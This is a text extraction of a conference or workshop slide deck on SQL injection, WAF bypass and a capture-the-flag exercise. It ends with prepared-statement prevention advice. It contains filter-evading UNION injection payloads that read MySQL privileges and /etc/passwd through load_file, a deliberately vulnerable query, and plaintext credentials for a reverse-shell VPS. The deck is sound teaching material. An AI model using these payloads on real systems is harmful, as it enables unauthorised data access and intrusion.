Slide 1

Slide 1 text

No content

Slide 2

Slide 2 text

RULES • No DDoSing to the servers • You can use whatever tools you want • Goal is to exploit the web app and root the box, then capture the flag inside the /root/ folder • Credentials for a temporary VPS to get a reverse shell • [email protected]:ilovelinux123

Slide 3

Slide 3 text

No content

Slide 4

Slide 4 text

START HACKING! 873067175 [email protected]:ilovelinux123

Slide 5

Slide 5 text

ABOUT ME Not any geek or any nerd ;-) https://osandamalith.com Passionate in Penetration Testing and Reverse Engineering IT Security Consultant at ZeroDayLab, London. Currently holds: OSCE, OSCP, OSWP, CREST CRTPEN, eCRE, eWPTX, eCPPTX, eCPPT Author of few vulnerabilities and 0days. https://www.exploit- db.com/?author=6712 I love to make things, break things and make things that break things ;) DJ at Ministry of Sound, London, UK

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

ALL MY EXPLOITS INSIDE KALI • grep -rnw '/usr/share/exploitdb/exploits/' -e 'Osanda’

Slide 8

Slide 8 text

• https://thehackernews.com/2018/09/4g-ee-wifi- modem-hack.html • https://www.theregister.co.uk/2018/09/19/ee_ modem_vuln/

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

BUG BOUNTY VS PENTESTING

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

PENETRATION PROCESS • Information Gathering • Scanning • Enumeration • VA & Exploitation • Post Exploitation

Slide 15

Slide 15 text

SQL INJECTION

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

SQL Injection Intention Extracting data, Bypassing Auth, Priv Esc, etc Source of Vulnerability User input, HTTP headers, second order injection, Files, etc Exploitation Technique Inband, Out-of-Band, Inference

Slide 18

Slide 18 text

SQLi Exploitation Techniques Inband Union-Based Error-Based Out-of-Band HTTP, DNS, Email Inference Boolean Based Time Based

Slide 19

Slide 19 text

MY ERROR BASED RESEARCHES • Error Based SQL Injection Using EXP • https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/ • https://www.exploit-db.com/papers/37953 • BIGINT Overflow Error Based SQL Injection • https://osandamalith.com/2015/07/08/bigint-overflow-error-based-sql-injection/ • https://www.exploit-db.com/papers/37733

Slide 20

Slide 20 text

MYSQL OUT OF BAND HACKING • https://osandamalith.com/2017/02/03/m ysql-out-of-band-hacking/ • https://www.exploit- db.com/papers/41273 • https://packetstormsecurity.com/files/14 0832/MySQL-OOB-Hacking.html

Slide 21

Slide 21 text

VULNERABLE QUERY • $query = "SELECT id,name,join_date,title FROM members WHERE name = '" . $member_name . “’;”; • SELECT id,name,join_date,title FROM members WHERE name = ‘Ergo’; • SELECT id,name,join_date,title FROM members WHERE name = ‘Ergo’ UNION SELECT 1,2,3,4; • SELECT id,name,join_date,title FROM members WHERE name = ‘Ergo’ UNION SELECT @@version,2,3,4;

Slide 22

Slide 22 text

WEB APPLICATION FIREWALLS

Slide 23

Slide 23 text

WAFS! if (isset($_REQUEST['member_name']) && $_REQUEST['member_name'] !== '') { $member_name = $_REQUEST['member_name']; $member_name = preg_replace("/union|select/i", "", $member_name); $member_name = preg_replace("/into|outfile|dumpfile|[#]|[--]/i", "nope", $member_name); $member_name = preg_replace("(or|and|OR|AND)", "nope", $member_name); $connection = @mysqli_connect(MYSQLHOST, MYSQLUSER, MYSQLPASS, MYSQLDB);

Slide 24

Slide 24 text

WAFS! if (preg_match('/UNION|SELECT|union|select|\s/', $workaround)) { echo "
"; echo "
SQL Injection Attempt Detected!
"; echo "
";

Slide 25

Slide 25 text

WHEN /OR/i IS FILTERED. • https://osandamalith.com/2017/02 /03/alternative-for- information_schema-tables-in- mysql/ • https://www.exploit- db.com/papers/41274 • https://packetstormsecurity.com/fi les/140831/Alternative-For- Information_Schema.Tables-In- MySQL.html

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

No content

Slide 28

Slide 28 text

MYSQL PRIVILEGES • File_priv • Enables reading and writing files on the server host using the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. A user who has the FILE privilege can read any file on the server host that is either world- readable or readable by the MySQL server. (This implies the user can read any file in any database directory, because the server can access any of those files.) • Enables creating new files in any directory where the MySQL server has write access. This includes the server's data directory containing the files that implement the privilege tables. •

Slide 29

Slide 29 text

CHECKING PRIVELEGES

Slide 30

Slide 30 text

• select File_priv from mysql.user where user = substring_index(user(), '@', 1) ; • null'unUNIONiOn/**/selSELECTeCt/**/1,File_Priv,3,4/**/from/**/mysql.user/**/ where/**/user=substring_index(user(),'@',1)&&1=‘1

Slide 31

Slide 31 text

PASSWD FILE • null'uNunionIoN/**/SeLselectEcT/**/1,load_file('/etc/passwd' ),3,4||1='1

Slide 32

Slide 32 text

SOURCE CODE REVIEW

Slide 33

Slide 33 text

SOURCE CODE REVIEW! • /var/www/html/auth.php

Slide 34

Slide 34 text

INVESTIGATING THE COOKIE FUNCTIONS • /var/www/html/includes/security.php

Slide 35

Slide 35 text

EVAL IS DANGEROUS https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/

Slide 36

Slide 36 text

CREATING A COOKIE

Slide 37

Slide 37 text

OUR EXPLOIT!

Slide 38

Slide 38 text

PWNED!

Slide 39

Slide 39 text

ROOT THE BOX! PRIVILEGE ESCALATION • System and network information • User information • Privileged Access / Cleartext credentials • Services • Jobs/Tasks • Installed software version information

Slide 40

Slide 40 text

CAPTURE THE FLAG [CTF]

Slide 41

Slide 41 text

No content

Slide 42

Slide 42 text

SQLI PREVENTION • Use prepared statements and parameterized queries • Using PHP Data Objects (PDO) $stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name'); $stmt->execute(array('name' => $name)); foreach ($stmt as $row) { // Do something with $row } • Supports any database driver and the universal option.

Slide 43

Slide 43 text

SQLI PREVENTION • Using MySQLi Extension (MySQL Improved) $stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?'); $stmt->bind_param('s', $name); // 's' specifies the variable type => 'string' $stmt->execute(); $result = $stmt->get_result(); while ($row = $result->fetch_assoc()) { // Do something with $row }

Slide 44

Slide 44 text

ALL MY RESEARCHES ON SQL INJECTION • https://osandamalith.com/tag/mysql/

Slide 45

Slide 45 text

ANY QUESTIONS?